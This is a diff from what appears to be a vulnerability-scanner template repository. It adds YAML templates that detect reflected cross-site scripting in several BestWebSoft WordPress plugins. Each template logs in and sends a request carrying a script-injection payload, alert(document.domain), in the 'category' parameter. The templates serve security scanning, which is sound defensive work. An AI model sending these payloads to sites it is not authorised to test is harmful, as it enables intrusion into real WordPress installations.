BestWebSoft's Twitter < 2.55 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The twitter-plugin plugin before 2.55 for WordPress has XSS. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18505 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18505 + - https://wordpress.org/plugins/twitter-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18505 + cwe-id: CWE-79 + epss-score: 0.00163 + epss-percentile: 0.5277 + cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: twitter_button + framework: wordpress + publicwww-query: "/wp-content/plugins/twitter-plugin/" + tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Twitter Button by")' + condition: and + +# digest: 4a0a00473045022100e6b1c52d7f5c150e6287fb21af9afe218e99ab2b2d151db2ea3f3c534bb00b85022010801be84c480278a05dd536d823107f7169a27d4fde87677477076f2d591874:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml new file mode 100644 index 0000000000..51c10a689e --- /dev/null +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -0,0 +1,57 @@ +id: CVE-2017-18516 + +info: + name: LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.0.5 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18516 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18516 + - https://wordpress.org/plugins/bws-linkedin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18516 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: linkedin + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-linkedin/" + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "LinkedIn by BestWebSoft")' + condition: and + +# digest: 4b0a00483046022100b86ea06fbcaa289e194e02bc021b9c5d1bef723a99757c4a032a7e40181c86e70221009ae105e33a7b5273d4fa7acee73bd0fe39caaffd74b6fd7dc8d00eedd36bcec5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml new file mode 100644 index 0000000000..564670dcb9 --- /dev/null +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -0,0 +1,57 @@ +id: CVE-2017-18517 + +info: + name: Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.0.5 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18517 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18517 + - https://wordpress.org/plugins/bws-pinterest/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18517 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: pinterest + framework: wordpress + publicwww-query: /wp-content/plugins/bws-pinterest/ + tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Pinterest by BestWebSoft")' + condition: and + +# digest: 4a0a004730450220077ae63f4bc53d7b4d02cfdc69803655e8d8606642f9d679617900231025cc47022100daaf66f0889e469b8e049a3146caeb58d3390921cb10043178048ac123cbad38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml new file mode 100644 index 0000000000..209ab3d998 --- /dev/null +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -0,0 +1,57 @@ +id: CVE-2017-18518 + +info: + name: SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.1.0 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18518 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18518 + - https://wordpress.org/plugins/bws-smtp/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18518 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: smtp + framework: wordpress + publicwwww-query: /wp-content/plugins/bws-smtp/ + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "SMTP by BestWebSoft")' + condition: and + +# digest: 4a0a004730450221009300ca3dc0c62a23ec8ccb12da5850614f3c1d71dfafa3849399e65653df4954022033e71aa063972ce39c5e704e33b145833542534dc6e7b4938e15aadf4ca835a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml new file mode 100644 index 0000000000..9ef716b736 --- /dev/null +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18527 + +info: + name: Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The pagination plugin before 1.0.7 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18527 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18527 + - https://wordpress.org/plugins/pagination/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18527 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: pagination + framework: wordpress + publicwww-query: "/wp-content/plugins/pagination/" + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/pagination/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Pagination by BestWebSoft")' + condition: and + +# digest: 490a0046304402200cfdecb83e98064de15735a77538f01dffbe8adc1b9c7553e6f97c597fdc3505022014b2e961116d908647b1b3d095c2b92078ef36382f8a7f2f1f1756c4992f4028:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml new file mode 100644 index 0000000000..44807d032d --- /dev/null +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18528 + +info: + name: PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18528 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18528 + - https://wordpress.org/plugins/pdf-print/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18528 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: pdf_\&_print + framework: wordpress + publicewww-query: "/wp-content/plugins/pdf-print/" + tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "PDF & Print by BestWebSoft")' + condition: and + +# digest: 4a0a0047304502201b2114b39ad36dee7d5726d72ebf4bec4b7a521b8e7269557d37c31be6204123022100d5ab65dbc867a3ea4ad131952536c179b72db3152101e5fcd4435d39a5096ec4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml new file mode 100644 index 0000000000..a847c288fe --- /dev/null +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18529 + +info: + name: PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The promobar plugin before 1.1.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18529 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18529 + - https://wordpress.org/plugins/promobar/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18529 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: promobar + framework: wordpress + publicwww-query: /wp-content/plugins/promobar/ + tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/promobar/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "PromoBar by BestWebSoft")' + condition: and + +# digest: 4a0a0047304502206532fb233cf3e88edffd5b348003368db2a08db344ab806830e5232696260982022100938e206e1f6435eb29428ad6c8556e777fed156cd6d1622497058e43b3876f3b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml new file mode 100644 index 0000000000..51ea065cc1 --- /dev/null +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18530 + +info: + name: Rating by BestWebSoft < 0.2 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The rating-bws plugin before 0.2 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18530 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18530 + - https://wordpress.org/plugins/rating-bws/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18530 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: rating + framework: wordpress + publicwww-query: "/wp-content/plugins/rating-bws/" + tags: cve,cve2017,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Rating by BestWebSoft")' + condition: and + +# digest: 4b0a004830460221008930c7f84f50ac75f101440ae8b956816e627ec61986b2c5e9daa797703736af022100be6958cf6709d065797dd4f6c339815a594df9623532d0d0b3556b67d6ed96e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml new file mode 100644 index 0000000000..3ceed07f1e --- /dev/null +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18532 + +info: + name: Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The realty plugin before 1.1.0 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18532 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18532 + - https://wordpress.org/plugins/realty/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18532 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: realty + framework: wordpress + publicwww-query: /wp-content/plugins/realty/ + tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/realty/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Realty by BestWebSoft")' + condition: and + +# digest: 4a0a0047304502206ee6aea9219193cdbc5ae928cc827367afaacd369f48d12f1b5d2758d5551dbf0221009d88922f7db3088ca5f2cd0eef0a8734b9974ab3c4c5c7cd64f098b20bd65b89:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 2977c64992..dacb49a81b 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting. + remediation: | + Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - https://wordpress.org/plugins/stop-user-enumeration/#developers @@ -14,9 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 - tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: fullworks + product: stop_user_enumeration + framework: wordpress + tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin http: - method: GET @@ -26,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 4a0a00473045022001b72464748fe057e67ff42b9f0244d894c3a16d22854baa9667c54ac889bb88022100c49b811539ffedfafc0a05af63f735e66131f2692c68982db0b737f3bb0ea11e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml new file mode 100644 index 0000000000..8fae52884e --- /dev/null +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18537 + +info: + name: Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18537 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18537 + - https://wordpress.org/plugins/visitors-online/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18537 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: visitors_online + framework: wordpress + publicewww-query: "/wp-content/plugins/visitors-online/" + tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Visitors Online by")' + condition: and + +# digest: 490a00463044022058bf40fe0537ce574137fad3418de8255110f8a6474bf424d52161da5b78f70902200e0a1f0fc0cb6bc408f0baa4a09ef7a4e9ca6a11c7cada9b4787d32aafcb994a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml new file mode 100644 index 0000000000..e4d5d58f10 --- /dev/null +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18542 + +info: + name: Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18542 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18542 + - https://wordpress.org/plugins/zendesk-help-center/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18542 + cwe-id: CWE-79 + epss-score: 0.00221 + epss-percentile: 0.59988 + cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: zendesk_help_center + framework: wordpress + publicwww-query: "/wp-content/plugins/zendesk-help-center/" + tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' + condition: and + +# digest: 4a0a00473045022100ebe6a293bd88eb8d93af26317ce52a6eeaaa625ad7df7e874be5d8bb2aad259d0220009af145871c1b33120276983678d8d4bddf43aab3a87f7575f8ef6e1d0f4c31:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml new file mode 100644 index 0000000000..41cee68cc5 --- /dev/null +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -0,0 +1,57 @@ +id: CVE-2017-18556 + +info: + name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.7.1 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18556 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556 + - https://wordpress.org/plugins/bws-google-analytics/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18556 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: google_analytics + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-google-analytics/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google Analytics by BestWebSoft")' + condition: and + +# digest: 4a0a00473045022100b22d64fbe2e6c500bbaed4b4a462dd2baee9f3181eff6d15fa3406d67ce6c1c30220773027c9bd66f88c9fdb426506ab7fdc2f6d050279a268007829f3845ee400bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml new file mode 100644 index 0000000000..2f365ff6cf --- /dev/null +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -0,0 +1,57 @@ +id: CVE-2017-18557 + +info: + name: Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.3.6 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18557 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18557 + - https://wordpress.org/plugins/bws-google-maps/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18557 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: google_maps + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-google-maps/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + 